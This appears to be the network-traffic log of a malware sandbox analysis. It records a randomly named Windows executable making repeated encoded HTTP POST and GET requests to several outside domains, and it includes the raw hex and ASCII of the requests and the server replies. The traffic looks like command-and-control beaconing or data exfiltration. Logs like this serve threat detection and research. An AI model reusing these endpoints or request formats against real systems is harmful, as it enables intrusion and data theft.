                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 6d 58 31 7a 37 74 69 68 68 68 79 43 6c 6f 68 77 6b 61 6f 6f 6a 57 79 30 38 49 44 51 4b 74 35 4f 71 75 37 35 71 59 74 35 39 59 4f 58 77 33 30 65 41 41 72 74 77 64 35 58 62 63 7a 47 74 6f 77 32 74 43 61 42 77 34 68 75 46 41 69 37 59 74 64 61 6a 4a 71 55 68 38 4c 4e 6c 6a 75 62 72 37 6a 47 36 38 46 70 70 34 49 6a 43 55 5a 6a 79 30 73 35 44 53 68 64 6d 44 5a 75 78 6f 6c 4e 79 63 57 74 33 6c 44 58 61 37 78 45 41 37 48 4c 38 41 51 52 34 4d 46 41 39 7a 39 43 6b 69 67 53 68 36 73 64 79 4c 30 68 64 [TRUNCATED]
Data Ascii: gd=[TRUNCATED]
Sep 14, 2024 11:11:34.569891930 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:34 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 18.139.62.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:36.221396923 CEST | 515 | OUT | GET /p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 14, 2024 11:11:37.124176979 CEST | 510 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:36 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 66.81.203.10 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:42.404767036 CEST | 775 | OUT | POST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 4f 48 69 61 74 5a 61 64 58 32 4a 2f 41 36 76 6f 55 4a 2b 38 4f 2f 62 50 43 68 32 2f 64 30 56 61 4b 51 3d 3d
                  Data Ascii: gd=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjOHiatZadX2J/A6voUJ+8O/bPCh2/d0VaKQ==
Sep 14, 2024 11:11:42.992011070 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:42 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 66.81.203.10 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:44.943120956 CEST | 795 | OUT | POST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 2f 38 66 6d 2f 4c 51 33 6f 54 52 64 79 51 53 4a 42 7a 33 39 48 41 71 4e 50 68 5a 50 37 2b 64 65 34 3d
                  Data Ascii: gd=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc//8fm/LQ3oTRdyQSJBz39HAqNPhZP7+de4=
Sep 14, 2024 11:11:45.517853022 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:45 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49744 | 66.81.203.10 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:47.491945982 CEST | 10877 | OUT | POST /osde/ HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.mediaplug.biz
                  Referer: http://www.mediaplug.biz/osde/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 41 63 63 62 58 4e 42 4a 58 6e 47 4f 48 42 50 56 72 2b 62 31 34 70 4a 75 43 49 62 4a 39 59 33 70 4f 6f 6c 73 69 72 42 39 6a 76 47 70 6c 50 51 58 4c 32 56 64 6c 44 4a 4b 6e 2f 64 34 2b 48 65 7a 48 79 73 52 59 34 6d 39 45 73 41 35 48 36 42 4d 77 56 77 79 5a 33 37 55 79 4c 48 49 36 43 57 57 49 58 32 6c 4b 50 64 76 7a 6e 44 76 32 6d 43 7a 4a 50 55 6d 61 76 66 46 38 6d 66 65 62 36 48 55 6a 6e 6c 6f 59 38 72 6e 48 44 57 6a 4e 65 34 71 57 44 52 57 39 55 4d 4d 65 74 61 51 56 74 66 64 4a 53 4c 4f 6a [TRUNCATED]
                  Data Ascii: gd= [TRUNCATED]
                  Sep 14, 2024 11:11:48.087112904 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:48 GMT
                  Content-Type: text/html
                  Content-Length: 575
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.4 | 49745 | 66.81.203.108 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:11:50.040980101 CEST | 511 | OUT | GET /osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.mediaplug.biz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:11:50.612376928 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.14.2
                  Date: Sat, 14 Sep 2024 09:11:50 GMT
                  Content-Type: text/html
                  Content-Length: 1432
                  Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                  Connection: close
                  ETag: "66435707-598"
                  Accept-Ranges: bytes
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
                  Sep 14, 2024 11:11:50.612507105 CEST | 224 | IN | Data Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                  Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.j
                  Sep 14, 2024 11:11:50.612517118 CEST | 206 | IN | Data Raw: 73 3f 62 65 66 6f 72 65 42 6f 64 79 45 6e 64 48 54 4d 4c 3d 25 33 43 70 25 33 45 54 68 69 73 2b 64 6f 6d 61 69 6e 2b 69 73 2b 70 65 6e 64 69 6e 67 2b 72 65 6e 65 77 61 6c 2b 6f 72 2b 68 61 73 2b 65 78 70 69 72 65 64 2e 2b 50 6c 65 61 73 65 2b 63
                  Data Ascii: s?beforeBodyEndHTML=%3Cp%3EThis+domain+is+pending+renewal+or+has+expired.+Please+contact+the+domain+provider+with+questions.%3C%2Fp%3E">' + '<\/script>' ) </script> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.4 | 49746 | 103.42.108.46 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:11:56.460100889 CEST | 790 | OUT | POST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 4a 42 54 2b 2b 5a 37 76 57 6a 6d 45 69 43 66 51 78 66 5a 4f 52 53 4e 2b 4f 38 39 44 54 76 55 39 41 3d 3d
                  Data Ascii: gd=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5YJBT++Z7vWjmEiCfQxfZORSN+O89DTvU9A==
                  Sep 14, 2024 11:11:57.284892082 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:11:57 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.4 | 49747 | 103.42.108.46 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:11:59.008897066 CEST | 810 | OUT | POST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 32 2b 6a 4a 31 4a 4f 51 53 64 6d 45 79 59 4e 74 5a 41 2f 39 59 58 53 46 63 38 76 6e 49 74 49 61 77 3d
